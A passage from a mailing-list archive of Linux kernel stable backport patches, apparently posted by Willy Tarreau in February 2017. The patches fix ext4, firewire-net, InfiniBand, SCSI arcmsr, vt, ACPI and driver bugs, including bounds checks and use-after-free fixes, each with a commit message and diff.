if (mmc_host_cmd23(card->host)) {
- if (mmc_card_mmc(card) ||
+ if ((mmc_card_mmc(card) &&
+ card->csd.mmca_vsn >= CSD_SPEC_VER_3) ||
(mmc_card_sd(card) &&
card->scr.cmds & SD_SCR_CMD23_SUPPORT))
md->flags |= MMC_BLK_CMD23;
--
2.8.0.rc2.1.gbe9624a

Willy Tarreau

unread,
Feb 5, 2017, 2:40:08 PM2/5/17
to
From: Michal Hocko <mho...@suse.com>

commit 735f2770a770156100f534646158cb58cb8b2939 upstream.

Commit fec1d0115240 ("[PATCH] Disable CLONE_CHILD_CLEARTID for abnormal
exit") has caused a subtle regression in nscd which uses
CLONE_CHILD_CLEARTID to clear the nscd_certainly_running flag in the
shared databases, so that the clients are notified when nscd is
restarted. Now, when nscd uses a non-persistent database, clients that
have it mapped keep thinking the database is being updated by nscd, when
in fact nscd has created a new (anonymous) one (for non-persistent
databases it uses an unlinked file as backend).

The original proposal for the CLONE_CHILD_CLEARTID change claimed
(https://lkml.org/lkml/2006/10/25/233):

: The NPTL library uses the CLONE_CHILD_CLEARTID flag on clone() syscalls
: on behalf of pthread_create() library calls. This feature is used to
: request that the kernel clear the thread-id in user space (at an address
: provided in the syscall) when the thread disassociates itself from the
: address space, which is done in mm_release().
:
: Unfortunately, when a multi-threaded process incurs a core dump (such as
: from a SIGSEGV), the core-dumping thread sends SIGKILL signals to all of
: the other threads, which then proceed to clear their user-space tids
: before synchronizing in exit_mm() with the start of core dumping. This
: misrepresents the state of process's address space at the time of the
: SIGSEGV and makes it more difficult for someone to debug NPTL and glibc
: problems (misleading him/her to conclude that the threads had gone away
: before the fault).
:
: The fix below is to simply avoid the CLONE_CHILD_CLEARTID action if a
: core dump has been initiated.

The resulting patch from Roland (https://lkml.org/lkml/2006/10/26/269)
seems to have a larger scope than the original patch asked for. It
seems that limitting the scope of the check to core dumping should work
for SIGSEGV issue describe above.

[Changelog partly based on Andreas' description]
Fixes: fec1d0115240 ("[PATCH] Disable CLONE_CHILD_CLEARTID for abnormal exit")
Link: http://lkml.kernel.org/r/1471968749-26173-1-g...@kernel.org
Signed-off-by: Michal Hocko <mho...@suse.com>
Tested-by: William Preston <wpre...@suse.com>
Acked-by: Oleg Nesterov <ol...@redhat.com>
Cc: Roland McGrath <rol...@hack.frob.com>
Cc: Andreas Schwab <sch...@suse.com>
Signed-off-by: Andrew Morton <ak...@linux-foundation.org>
Signed-off-by: Linus Torvalds <torv...@linux-foundation.org>
Signed-off-by: Willy Tarreau <w...@1wt.eu>
---
kernel/fork.c | 10 ++++------
1 file changed, 4 insertions(+), 6 deletions(-)

diff --git a/kernel/fork.c b/kernel/fork.c
index 2358bd4..612e78d 100644
--- a/kernel/fork.c
+++ b/kernel/fork.c
@@ -775,14 +775,12 @@ void mm_release(struct task_struct *tsk, struct mm_struct *mm)
deactivate_mm(tsk, mm);

/*
- * If we're exiting normally, clear a user-space tid field if
- * requested. We leave this alone when dying by signal, to leave
- * the value intact in a core dump, and to save the unnecessary
- * trouble, say, a killed vfork parent shouldn't touch this mm.
- * Userland only wants this done for a sys_exit.
+ * Signal userspace if we're not exiting with a core dump
+ * because we want to leave the value intact for debugging
+ * purposes.
*/
if (tsk->clear_child_tid) {
- if (!(tsk->flags & PF_SIGNALED) &&
+ if (!(tsk->signal->flags & SIGNAL_GROUP_COREDUMP) &&
atomic_read(&mm->mm_users) > 1) {
/*
* We don't check the error code - if userspace has
--
2.8.0.rc2.1.gbe9624a

Willy Tarreau

unread,
Feb 5, 2017, 2:40:08 PM2/5/17
to
From: Konstantin Khlebnikov <khleb...@yandex-team.ru>

commit adb7ef600cc9d9d15ecc934cc26af5c1379777df upstream.

This might be unexpected but pages allocated for sbi->s_buddy_cache are
charged to current memory cgroup. So, GFP_NOFS allocation could fail if
current task has been killed by OOM or if current memory cgroup has no
free memory left. Block allocator cannot handle such failures here yet.

Signed-off-by: Konstantin Khlebnikov <khleb...@yandex-team.ru>
Signed-off-by: Theodore Ts'o <ty...@mit.edu>
Signed-off-by: Willy Tarreau <w...@1wt.eu>
---
fs/ext4/mballoc.c | 47 ++++++++++++++++++++++++++++-------------------
1 file changed, 28 insertions(+), 19 deletions(-)

diff --git a/fs/ext4/mballoc.c b/fs/ext4/mballoc.c
index 08b4495..cb9eec0 100644
--- a/fs/ext4/mballoc.c
+++ b/fs/ext4/mballoc.c
@@ -808,7 +808,7 @@ static void mb_regenerate_buddy(struct ext4_buddy *e4b)
* for this page; do not hold this lock when calling this routine!
*/

-static int ext4_mb_init_cache(struct page *page, char *incore)
+static int ext4_mb_init_cache(struct page *page, char *incore, gfp_t gfp)
{
ext4_group_t ngroups;
int blocksize;
@@ -841,7 +841,7 @@ static int ext4_mb_init_cache(struct page *page, char *incore)
/* allocate buffer_heads to read bitmaps */
if (groups_per_page > 1) {
i = sizeof(struct buffer_head *) * groups_per_page;
- bh = kzalloc(i, GFP_NOFS);
+ bh = kzalloc(i, gfp);
if (bh == NULL) {
err = -ENOMEM;
goto out;
@@ -966,7 +966,7 @@ out:
* are on the same page e4b->bd_buddy_page is NULL and return value is 0.
*/
static int ext4_mb_get_buddy_page_lock(struct super_block *sb,
- ext4_group_t group, struct ext4_buddy *e4b)
+ ext4_group_t group, struct ext4_buddy *e4b, gfp_t gfp)
{
struct inode *inode = EXT4_SB(sb)->s_buddy_cache;
int block, pnum, poff;
@@ -985,7 +985,7 @@ static int ext4_mb_get_buddy_page_lock(struct super_block *sb,
block = group * 2;
pnum = block / blocks_per_page;
poff = block % blocks_per_page;
- page = find_or_create_page(inode->i_mapping, pnum, GFP_NOFS);
+ page = find_or_create_page(inode->i_mapping, pnum, gfp);
if (!page)
return -EIO;
BUG_ON(page->mapping != inode->i_mapping);
@@ -999,7 +999,7 @@ static int ext4_mb_get_buddy_page_lock(struct super_block *sb,

block++;
pnum = block / blocks_per_page;
- page = find_or_create_page(inode->i_mapping, pnum, GFP_NOFS);
+ page = find_or_create_page(inode->i_mapping, pnum, gfp);
if (!page)
return -EIO;
BUG_ON(page->mapping != inode->i_mapping);
@@ -1025,7 +1025,7 @@ static void ext4_mb_put_buddy_page_lock(struct ext4_buddy *e4b)
* calling this routine!
*/
static noinline_for_stack
-int ext4_mb_init_group(struct super_block *sb, ext4_group_t group)
+int ext4_mb_init_group(struct super_block *sb, ext4_group_t group, gfp_t gfp)
{

struct ext4_group_info *this_grp;
@@ -1043,7 +1043,7 @@ int ext4_mb_init_group(struct super_block *sb, ext4_group_t group)
* have taken a reference using ext4_mb_load_buddy and that
* would have pinned buddy page to page cache.
*/
- ret = ext4_mb_get_buddy_page_lock(sb, group, &e4b);
+ ret = ext4_mb_get_buddy_page_lock(sb, group, &e4b, gfp);
if (ret || !EXT4_MB_GRP_NEED_INIT(this_grp)) {
/*
* somebody initialized the group
@@ -1053,7 +1053,7 @@ int ext4_mb_init_group(struct super_block *sb, ext4_group_t group)
}

page = e4b.bd_bitmap_page;
- ret = ext4_mb_init_cache(page, NULL);
+ ret = ext4_mb_init_cache(page, NULL, gfp);
if (ret)
goto err;
if (!PageUptodate(page)) {
@@ -1073,7 +1073,7 @@ int ext4_mb_init_group(struct super_block *sb, ext4_group_t group)
}
/* init buddy cache */
page = e4b.bd_buddy_page;
- ret = ext4_mb_init_cache(page, e4b.bd_bitmap);
+ ret = ext4_mb_init_cache(page, e4b.bd_bitmap, gfp);
if (ret)
goto err;
if (!PageUptodate(page)) {
@@ -1092,8 +1092,8 @@ err:
* calling this routine!
*/
static noinline_for_stack int
-ext4_mb_load_buddy(struct super_block *sb, ext4_group_t group,
- struct ext4_buddy *e4b)
+ext4_mb_load_buddy_gfp(struct super_block *sb, ext4_group_t group,
+ struct ext4_buddy *e4b, gfp_t gfp)
{
int blocks_per_page;
int block;
@@ -1123,7 +1123,7 @@ ext4_mb_load_buddy(struct super_block *sb, ext4_group_t group,
* we need full data about the group
* to make a good selection
*/
- ret = ext4_mb_init_group(sb, group);
+ ret = ext4_mb_init_group(sb, group, gfp);
if (ret)
return ret;
}
@@ -1151,11 +1151,11 @@ ext4_mb_load_buddy(struct super_block *sb, ext4_group_t group,
* wait for it to initialize.
*/
page_cache_release(page);
- page = find_or_create_page(inode->i_mapping, pnum, GFP_NOFS);
+ page = find_or_create_page(inode->i_mapping, pnum, gfp);
if (page) {
BUG_ON(page->mapping != inode->i_mapping);
if (!PageUptodate(page)) {
- ret = ext4_mb_init_cache(page, NULL);
+ ret = ext4_mb_init_cache(page, NULL, gfp);
if (ret) {
unlock_page(page);
goto err;
@@ -1182,11 +1182,12 @@ ext4_mb_load_buddy(struct super_block *sb, ext4_group_t group,
if (page == NULL || !PageUptodate(page)) {
if (page)
page_cache_release(page);
- page = find_or_create_page(inode->i_mapping, pnum, GFP_NOFS);
+ page = find_or_create_page(inode->i_mapping, pnum, gfp);
if (page) {
BUG_ON(page->mapping != inode->i_mapping);
if (!PageUptodate(page)) {
- ret = ext4_mb_init_cache(page, e4b->bd_bitmap);
+ ret = ext4_mb_init_cache(page, e4b->bd_bitmap,
+ gfp);
if (ret) {
unlock_page(page);
goto err;
@@ -1220,6 +1221,12 @@ err:
return ret;
}

+static int ext4_mb_load_buddy(struct super_block *sb, ext4_group_t group,
+ struct ext4_buddy *e4b)
+{
+ return ext4_mb_load_buddy_gfp(sb, group, e4b, GFP_NOFS);
+}
+
static void ext4_mb_unload_buddy(struct ext4_buddy *e4b)
{
if (e4b->bd_bitmap_page)
@@ -1993,7 +2000,7 @@ static int ext4_mb_good_group(struct ext4_allocation_context *ac,

/* We only do this if the grp has never been initialized */
if (unlikely(EXT4_MB_GRP_NEED_INIT(grp))) {
- int ret = ext4_mb_init_group(ac->ac_sb, group);
+ int ret = ext4_mb_init_group(ac->ac_sb, group, GFP_NOFS);
if (ret)
return 0;
}
@@ -4748,7 +4755,9 @@ do_more:
#endif
trace_ext4_mballoc_free(sb, inode, block_group, bit, count_clusters);

- err = ext4_mb_load_buddy(sb, block_group, &e4b);
+ /* __GFP_NOFAIL: retry infinitely, ignore TIF_MEMDIE and memcg limit. */
+ err = ext4_mb_load_buddy_gfp(sb, block_group, &e4b,
+ GFP_NOFS|__GFP_NOFAIL);
if (err)
goto error_return;

@@ -5159,7 +5168,7 @@ int ext4_trim_fs(struct super_block *sb, struct fstrim_range *range)
grp = ext4_get_group_info(sb, group);
/* We only do this if the grp has never been initialized */
if (unlikely(EXT4_MB_GRP_NEED_INIT(grp))) {
- ret = ext4_mb_init_group(sb, group);
+ ret = ext4_mb_init_group(sb, group, GFP_NOFS);
if (ret)
break;
}
--
2.8.0.rc2.1.gbe9624a

Willy Tarreau

unread,
Feb 5, 2017, 2:40:08 PM2/5/17
to
From: Alex Vesker <va...@mellanox.com>

commit e5ac40cd66c2f3cd11bc5edc658f012661b16347 upstream.

Because of an incorrect bit-masking done on the join state bits, when
handling a join request we failed to detect a difference between the
group join state and the request join state when joining as send only
full member (0x8). This caused the MC join request not to be sent.
This issue is relevant only when SRIOV is enabled and SM supports
send only full member.

This fix separates scope bits and join states bits a nibble each.

Fixes: b9c5d6a64358 ('IB/mlx4: Add multicast group (MCG) paravirtualization for SR-IOV')
Signed-off-by: Alex Vesker <va...@mellanox.com>
Signed-off-by: Leon Romanovsky <le...@kernel.org>
Signed-off-by: Doug Ledford <dled...@redhat.com>
Signed-off-by: Willy Tarreau <w...@1wt.eu>
---
drivers/infiniband/hw/mlx4/mcg.c | 14 +++++++-------
1 file changed, 7 insertions(+), 7 deletions(-)

diff --git a/drivers/infiniband/hw/mlx4/mcg.c b/drivers/infiniband/hw/mlx4/mcg.c
index 25b2cdf..27bedc3 100644
--- a/drivers/infiniband/hw/mlx4/mcg.c
+++ b/drivers/infiniband/hw/mlx4/mcg.c
@@ -483,7 +483,7 @@ static u8 get_leave_state(struct mcast_group *group)
if (!group->members[i])
leave_state |= (1 << i);

- return leave_state & (group->rec.scope_join_state & 7);
+ return leave_state & (group->rec.scope_join_state & 0xf);
}

static int join_group(struct mcast_group *group, int slave, u8 join_mask)
@@ -558,8 +558,8 @@ static void mlx4_ib_mcg_timeout_handler(struct work_struct *work)
} else
mcg_warn_group(group, "DRIVER BUG\n");
} else if (group->state == MCAST_LEAVE_SENT) {
- if (group->rec.scope_join_state & 7)
- group->rec.scope_join_state &= 0xf8;
+ if (group->rec.scope_join_state & 0xf)
+ group->rec.scope_join_state &= 0xf0;
group->state = MCAST_IDLE;
mutex_unlock(&group->lock);
if (release_group(group, 1))
@@ -599,7 +599,7 @@ static int handle_leave_req(struct mcast_group *group, u8 leave_mask,
static int handle_join_req(struct mcast_group *group, u8 join_mask,
struct mcast_req *req)
{
- u8 group_join_state = group->rec.scope_join_state & 7;
+ u8 group_join_state = group->rec.scope_join_state & 0xf;
int ref = 0;
u16 status;
struct ib_sa_mcmember_data *sa_data = (struct ib_sa_mcmember_data *)req->sa_mad.data;
@@ -684,8 +684,8 @@ static void mlx4_ib_mcg_work_handler(struct work_struct *work)
u8 cur_join_state;

resp_join_state = ((struct ib_sa_mcmember_data *)
- group->response_sa_mad.data)->scope_join_state & 7;
- cur_join_state = group->rec.scope_join_state & 7;
+ group->response_sa_mad.data)->scope_join_state & 0xf;
+ cur_join_state = group->rec.scope_join_state & 0xf;

if (method == IB_MGMT_METHOD_GET_RESP) {
/* successfull join */
@@ -704,7 +704,7 @@ process_requests:
req = list_first_entry(&group->pending_list, struct mcast_req,
group_list);
sa_data = (struct ib_sa_mcmember_data *)req->sa_mad.data;
- req_join_state = sa_data->scope_join_state & 0x7;
+ req_join_state = sa_data->scope_join_state & 0xf;

/* For a leave request, we will immediately answer the VF, and
* update our internal counters. The actual leave will be sent
--
2.8.0.rc2.1.gbe9624a

Willy Tarreau

unread,
Feb 5, 2017, 2:40:08 PM2/5/17
to
From: "Paul E. McKenney" <pau...@linux.vnet.ibm.com>

commit 536fa402221f09633e7c5801b327055ab716a363 upstream.

CPUs without single-byte and double-byte loads and stores place some
"interesting" requirements on concurrent code. For example (adapted
from Peter Hurley's test code), suppose we have the following structure:

struct foo {
spinlock_t lock1;
spinlock_t lock2;
char a; /* Protected by lock1. */
char b; /* Protected by lock2. */
};
struct foo *foop;

Of course, it is common (and good) practice to place data protected
by different locks in separate cache lines. However, if the locks are
rarely acquired (for example, only in rare error cases), and there are
a great many instances of the data structure, then memory footprint can
trump false-sharing concerns, so that it can be better to place them in
the same cache cache line as above.

But if the CPU does not support single-byte loads and stores, a store
to foop->a will do a non-atomic read-modify-write operation on foop->b,
which will come as a nasty surprise to someone holding foop->lock2. So we
now require CPUs to support single-byte and double-byte loads and stores.
Therefore, this commit adjusts the definition of __native_word() to allow
these sizes to be used by smp_load_acquire() and smp_store_release().

Signed-off-by: Paul E. McKenney <pau...@linux.vnet.ibm.com>
Cc: Peter Zijlstra <pet...@infradead.org>
[wt: backported only for next patch]

Signed-off-by: Willy Tarreau <w...@1wt.eu>
---
include/linux/compiler.h | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/include/linux/compiler.h b/include/linux/compiler.h
index 53563d8..453da7b 100644
--- a/include/linux/compiler.h
+++ b/include/linux/compiler.h
@@ -362,7 +362,7 @@ static __always_inline void __write_once_size(volatile void *p, void *res, int s

/* Is this type a native word size -- useful for atomic operations */
#ifndef __native_word
-# define __native_word(t) (sizeof(t) == sizeof(int) || sizeof(t) == sizeof(long))
+# define __native_word(t) (sizeof(t) == sizeof(char) || sizeof(t) == sizeof(short) || sizeof(t) == sizeof(int) || sizeof(t) == sizeof(long))
#endif

/* Compile time object size, -1 for unknown */
--
2.8.0.rc2.1.gbe9624a

Willy Tarreau

unread,
Feb 5, 2017, 2:40:08 PM2/5/17
to
From: Dan Carpenter <dan.ca...@oracle.com>

commit f4cceb2affcd1285d4ce498089e8a79f4cd2fa66 upstream.

If kmap fails, it leads to memory corruption.

Fixes: f64122c1f6ad ('drm: add new QXL driver. (v1.4)')
Signed-off-by: Dan Carpenter <dan.ca...@oracle.com>
Signed-off-by: Daniel Vetter <daniel...@ffwll.ch>
Link: http://patchwork.freedesktop.org/patch/msgid/20160711084633.GA31411@mwanda
Signed-off-by: Willy Tarreau <w...@1wt.eu>
---
drivers/gpu/drm/qxl/qxl_draw.c | 2 ++
1 file changed, 2 insertions(+)

diff --git a/drivers/gpu/drm/qxl/qxl_draw.c b/drivers/gpu/drm/qxl/qxl_draw.c
index 3c8c3db..ff32052 100644
--- a/drivers/gpu/drm/qxl/qxl_draw.c
+++ b/drivers/gpu/drm/qxl/qxl_draw.c
@@ -114,6 +114,8 @@ static int qxl_palette_create_1bit(struct qxl_bo **palette_bo,
palette_bo);

ret = qxl_bo_kmap(*palette_bo, (void **)&pal);
+ if (ret)
+ return ret;
pal->num_ents = 2;
pal->unique = unique++;
if (visual == FB_VISUAL_TRUECOLOR || visual == FB_VISUAL_DIRECTCOLOR) {
--
2.8.0.rc2.1.gbe9624a

Willy Tarreau

unread,
Feb 5, 2017, 2:40:08 PM2/5/17
to
From: Florian Fainelli <f.fai...@gmail.com>

commit f823a2aa8f4674c095a5413b9e3ba12d82df06f2 upstream.

wlc_phy_txpower_get_current() does a logical OR of power->flags, which
presumes that power.flags was initiliazed earlier by the caller,
unfortunately, this is not the case, so make sure we zero out the struct
tx_power before calling into wlc_phy_txpower_get_current().

Reported-by: coverity (CID 146011)
Fixes: 5b435de0d7868 ("net: wireless: add brcm80211 drivers")
Signed-off-by: Florian Fainelli <f.fai...@gmail.com>
Acked-by: Arend van Spriel <arend.v...@broadcom.com>
Signed-off-by: Kalle Valo <kv...@codeaurora.org>
Signed-off-by: Willy Tarreau <w...@1wt.eu>
---
drivers/net/wireless/brcm80211/brcmsmac/stf.c | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/drivers/net/wireless/brcm80211/brcmsmac/stf.c b/drivers/net/wireless/brcm80211/brcmsmac/stf.c
index dd91627..0ab865d 100644
--- a/drivers/net/wireless/brcm80211/brcmsmac/stf.c
+++ b/drivers/net/wireless/brcm80211/brcmsmac/stf.c
@@ -87,7 +87,7 @@ void
brcms_c_stf_ss_algo_channel_get(struct brcms_c_info *wlc, u16 *ss_algo_channel,
u16 chanspec)
{
- struct tx_power power;
+ struct tx_power power = { };
u8 siso_mcs_id, cdd_mcs_id, stbc_mcs_id;

/* Clear previous settings */
--
2.8.0.rc2.1.gbe9624a

Willy Tarreau

unread,
Feb 5, 2017, 2:40:08 PM2/5/17
to
From: Dan Carpenter <dan.ca...@oracle.com>

commit 7bc2b55a5c030685b399bb65b6baa9ccc3d1f167 upstream.

We need to put an upper bound on "user_len" so the memcpy() doesn't
overflow.

[js] no ARCMSR_API_DATA_BUFLEN defined, use the number

Reported-by: Marco Grassi <marc...@gmail.com>
Signed-off-by: Dan Carpenter <dan.ca...@oracle.com>
Reviewed-by: Tomas Henzl <the...@redhat.com>
Signed-off-by: Martin K. Petersen <martin....@oracle.com>
Signed-off-by: Jiri Slaby <jsl...@suse.cz>
Signed-off-by: Willy Tarreau <w...@1wt.eu>
---
drivers/scsi/arcmsr/arcmsr_hba.c | 8 +++++++-
1 file changed, 7 insertions(+), 1 deletion(-)

diff --git a/drivers/scsi/arcmsr/arcmsr_hba.c b/drivers/scsi/arcmsr/arcmsr_hba.c
index 1822cb9..66dda86 100644
--- a/drivers/scsi/arcmsr/arcmsr_hba.c
+++ b/drivers/scsi/arcmsr/arcmsr_hba.c
@@ -1803,7 +1803,8 @@ static int arcmsr_iop_message_xfer(struct AdapterControlBlock *acb,

case ARCMSR_MESSAGE_WRITE_WQBUFFER: {
unsigned char *ver_addr;
- int32_t my_empty_len, user_len, wqbuf_firstindex, wqbuf_lastindex;
+ uint32_t user_len;
+ int32_t my_empty_len, wqbuf_firstindex, wqbuf_lastindex;
uint8_t *pQbuffer, *ptmpuserbuffer;

ver_addr = kmalloc(1032, GFP_ATOMIC);
@@ -1820,6 +1821,11 @@ static int arcmsr_iop_message_xfer(struct AdapterControlBlock *acb,
}
ptmpuserbuffer = ver_addr;
user_len = pcmdmessagefld->cmdmessage.Length;
+ if (user_len > 1032) {
+ retvalue = ARCMSR_MESSAGE_FAIL;
+ kfree(ver_addr);
+ goto message_out;
+ }
memcpy(ptmpuserbuffer, pcmdmessagefld->messagedatabuffer, user_len);
wqbuf_lastindex = acb->wqbuf_lastindex;
wqbuf_firstindex = acb->wqbuf_firstindex;
--
2.8.0.rc2.1.gbe9624a

Willy Tarreau

unread,
Feb 5, 2017, 2:40:08 PM2/5/17
to
From: Scot Doyle <lkm...@scotdoyle.com>

commit 009e39ae44f4191188aeb6dfbf661b771dbbe515 upstream.

When resizing a vt its selection may exceed the new size, resulting in
an invalid memory access [1]. Clear the selection before resizing.

[1] http://lkml.kernel.org/r/CACT4Y+acDTwy4umEvf5ROBGiRJNrxHN4Cn5szCXE5Jw-d1B=X...@mail.gmail.com

Reported-and-tested-by: Dmitry Vyukov <dvy...@google.com>
Signed-off-by: Scot Doyle <lkm...@scotdoyle.com>
Signed-off-by: Willy Tarreau <w...@1wt.eu>
---
drivers/tty/vt/vt.c | 3 +++
1 file changed, 3 insertions(+)

diff --git a/drivers/tty/vt/vt.c b/drivers/tty/vt/vt.c
index 5deddca..010ec70 100644
--- a/drivers/tty/vt/vt.c
+++ b/drivers/tty/vt/vt.c
@@ -869,6 +869,9 @@ static int vc_do_resize(struct tty_struct *tty, struct vc_data *vc,
if (!newscreen)
return -ENOMEM;

+ if (vc == sel_cons)
+ clear_selection();
+
old_rows = vc->vc_rows;
old_row_size = vc->vc_size_row;

--
2.8.0.rc2.1.gbe9624a

Willy Tarreau

unread,
Feb 5, 2017, 2:40:08 PM2/5/17
to
From: Punit Agrawal <punit....@arm.com>

commit 806487a8fc8f385af75ed261e9ab658fc845e633 upstream.

Although ghes_proc() tests for errors while reading the error status,
it always return success (0). Fix this by propagating the return
value.

Fixes: d334a49113a4a33 (ACPI, APEI, Generic Hardware Error Source memory error support)
Signed-of-by: Punit Agrawal <punit.agrawa.@arm.com>
Tested-by: Tyler Baicar <tba...@codeaurora.org>
Reviewed-by: Borislav Petkov <b...@suse.de>
[ rjw: Subject ]
Signed-off-by: Rafael J. Wysocki <rafael.j...@intel.com>
Signed-off-by: Willy Tarreau <w...@1wt.eu>
---
drivers/acpi/apei/ghes.c | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/drivers/acpi/apei/ghes.c b/drivers/acpi/apei/ghes.c
index fcd7d91..070b843 100644
--- a/drivers/acpi/apei/ghes.c
+++ b/drivers/acpi/apei/ghes.c
@@ -647,7 +647,7 @@ static int ghes_proc(struct ghes *ghes)
ghes_do_proc(ghes, ghes->estatus);
out:
ghes_clear_estatus(ghes);
- return 0;
+ return rc;
}

static void ghes_add_timer(struct ghes *ghes)
--
2.8.0.rc2.1.gbe9624a

Willy Tarreau

unread,
Feb 5, 2017, 2:40:08 PM2/5/17
to
From: Daeho Jeong <daeho...@samsung.com>

commit 93e3b4e6631d2a74a8cf7429138096862ff9f452 upstream.

Now, ext4_do_update_inode() clears high 16-bit fields of uid/gid
of deleted and evicted inode to fix up interoperability with old
kernels. However, it checks only i_dtime of an inode to determine
whether the inode was deleted and evicted, and this is very risky,
because i_dtime can be used for the pointer maintaining orphan inode
list, too. We need to further check whether the i_dtime is being
used for the orphan inode list even if the i_dtime is not NULL.

We found that high 16-bit fields of uid/gid of inode are unintentionally
and permanently cleared when the inode truncation is just triggered,
but not finished, and the inode metadata, whose high uid/gid bits are
cleared, is written on disk, and the sudden power-off follows that
in order.

Signed-off-by: Daeho Jeong <daeho...@samsung.com>
Signed-off-by: Hobin Woo <hobi...@samsung.com>
Signed-off-by: Theodore Ts'o <ty...@mit.edu>
Signed-off-by: Willy Tarreau <w...@1wt.eu>
---
fs/ext4/inode.c | 8 ++++----
1 file changed, 4 insertions(+), 4 deletions(-)

diff --git a/fs/ext4/inode.c b/fs/ext4/inode.c
index 046e0e1..a187055 100644
--- a/fs/ext4/inode.c
+++ b/fs/ext4/inode.c
@@ -4480,14 +4480,14 @@ static int ext4_do_update_inode(handle_t *handle,
* Fix up interoperability with old kernels. Otherwise, old inodes get
* re-used with the upper 16 bits of the uid/gid intact
*/
- if (!ei->i_dtime) {
+ if (ei->i_dtime && list_empty(&ei->i_orphan)) {
+ raw_inode->i_uid_high = 0;
+ raw_inode->i_gid_high = 0;
+ } else {
raw_inode->i_uid_high =
cpu_to_le16(high_16_bits(i_uid));
raw_inode->i_gid_high =
cpu_to_le16(high_16_bits(i_gid));
- } else {
- raw_inode->i_uid_high = 0;
- raw_inode->i_gid_high = 0;
}
} else {
raw_inode->i_uid_low = cpu_to_le16(fs_high2lowuid(i_uid));
--
2.8.0.rc2.1.gbe9624a

Willy Tarreau

unread,
Feb 5, 2017, 2:40:08 PM2/5/17
to
From: Stefan Richter <ste...@s5r6.in-berlin.de>

commit e9300a4b7bbae83af1f7703938c94cf6dc6d308f upstream.

RFC 2734 defines the datagram_size field in fragment encapsulation
headers thus:

datagram_size: The encoded size of the entire IP datagram. The
value of datagram_size [...] SHALL be one less than the value of
Total Length in the datagram's IP header (see STD 5, RFC 791).

Accordingly, the eth1394 driver of Linux 2.6.36 and older set and got
this field with a -/+1 offset:

ether1394_tx() /* transmit */
ether1394_encapsulate_prep()
hdr->ff.dg_size = dg_size - 1;

ether1394_data_handler() /* receive */
if (hdr->common.lf == ETH1394_HDR_LF_FF)
dg_size = hdr->ff.dg_size + 1;
else
dg_size = hdr->sf.dg_size + 1;

Likewise, I observe OS X 10.4 and Windows XP Pro SP3 to transmit 1500
byte sized datagrams in fragments with datagram_size=1499 if link
fragmentation is required.

Only firewire-net sets and gets datagram_size without this offset. The
result is lacking interoperability of firewire-net with OS X, Windows
XP, and presumably Linux' eth1394. (I did not test with the latter.)
For example, FTP data transfers to a Linux firewire-net box with max_rec
smaller than the 1500 bytes MTU
- from OS X fail entirely,
- from Win XP start out with a bunch of fragmented datagrams which
time out, then continue with unfragmented datagrams because Win XP
temporarily reduces the MTU to 576 bytes.

So let's fix firewire-net's datagram_size accessors.

Note that firewire-net thereby loses interoperability with unpatched
firewire-net, but only if link fragmentation is employed. (This happens
with large broadcast datagrams, and with large datagrams on several
FireWire CardBus cards with smaller max_rec than equivalent PCI cards,
and it can be worked around by setting a small enough MTU.)

Signed-off-by: Stefan Richter <ste...@s5r6.in-berlin.de>
Signed-off-by: Willy Tarreau <w...@1wt.eu>
---
drivers/firewire/net.c | 8 ++++----
1 file changed, 4 insertions(+), 4 deletions(-)

diff --git a/drivers/firewire/net.c b/drivers/firewire/net.c
index 70a716e..1321319 100644
--- a/drivers/firewire/net.c
+++ b/drivers/firewire/net.c
@@ -73,13 +73,13 @@ struct rfc2734_header {

#define fwnet_get_hdr_lf(h) (((h)->w0 & 0xc0000000) >> 30)
#define fwnet_get_hdr_ether_type(h) (((h)->w0 & 0x0000ffff))
-#define fwnet_get_hdr_dg_size(h) (((h)->w0 & 0x0fff0000) >> 16)
+#define fwnet_get_hdr_dg_size(h) ((((h)->w0 & 0x0fff0000) >> 16) + 1)
#define fwnet_get_hdr_fg_off(h) (((h)->w0 & 0x00000fff))
#define fwnet_get_hdr_dgl(h) (((h)->w1 & 0xffff0000) >> 16)

-#define fwnet_set_hdr_lf(lf) ((lf) << 30)
+#define fwnet_set_hdr_lf(lf) ((lf) << 30)
#define fwnet_set_hdr_ether_type(et) (et)
-#define fwnet_set_hdr_dg_size(dgs) ((dgs) << 16)
+#define fwnet_set_hdr_dg_size(dgs) (((dgs) - 1) << 16)
#define fwnet_set_hdr_fg_off(fgo) (fgo)

#define fwnet_set_hdr_dgl(dgl) ((dgl) << 16)
@@ -635,7 +635,7 @@ static int fwnet_incoming_packet(struct fwnet_device *dev, __be32 *buf, int len,
fg_off = fwnet_get_hdr_fg_off(&hdr);
}
datagram_label = fwnet_get_hdr_dgl(&hdr);
- dg_size = fwnet_get_hdr_dg_size(&hdr); /* ??? + 1 */
+ dg_size = fwnet_get_hdr_dg_size(&hdr);

if (fg_off + len > dg_size)
return 0;
--
2.8.0.rc2.1.gbe9624a

Willy Tarreau

unread,
Feb 5, 2017, 2:40:08 PM2/5/17
to
From: Erez Shitrit <ere...@mellanox.com>

commit 546481c2816ea3c061ee9d5658eb48070f69212e upstream.

When a new CM connection is being requested, ipoib driver copies data
from the path pointer in the CM/tx object, the path object might be
invalid at the point and memory corruption will happened later when now
the CM driver will try using that data.

The next scenario demonstrates it:
neigh_add_path --> ipoib_cm_create_tx -->
queue_work (pointer to path is in the cm/tx struct)
#while the work is still in the queue,
#the port goes down and causes the ipoib_flush_paths:
ipoib_flush_paths --> path_free --> kfree(path)
#at this point the work scheduled starts.
ipoib_cm_tx_start --> copy from the (invalid)path pointer:
(memcpy(&pathrec, &p->path->pathrec, sizeof pathrec);)
-> memory corruption.

To fix that the driver now starts the CM/tx connection only if that
specific path exists in the general paths database.
This check is protected with the relevant locks, and uses the gid from
the neigh member in the CM/tx object which is valid according to the ref
count that was taken by the CM/tx.

Fixes: 839fcaba35 ('IPoIB: Connected mode experimental support')
Signed-off-by: Erez Shitrit <ere...@mellanox.com>
Signed-off-by: Leon Romanovsky <le...@kernel.org>
Signed-off-by: Doug Ledford <dled...@redhat.com>
Signed-off-by: Willy Tarreau <w...@1wt.eu>
---
drivers/infiniband/ulp/ipoib/ipoib.h | 1 +
drivers/infiniband/ulp/ipoib/ipoib_cm.c | 16 ++++++++++++++++
drivers/infiniband/ulp/ipoib/ipoib_main.c | 2 +-
3 files changed, 18 insertions(+), 1 deletion(-)

diff --git a/drivers/infiniband/ulp/ipoib/ipoib.h b/drivers/infiniband/ulp/ipoib/ipoib.h
index eb71aaa..fb9a7b3 100644
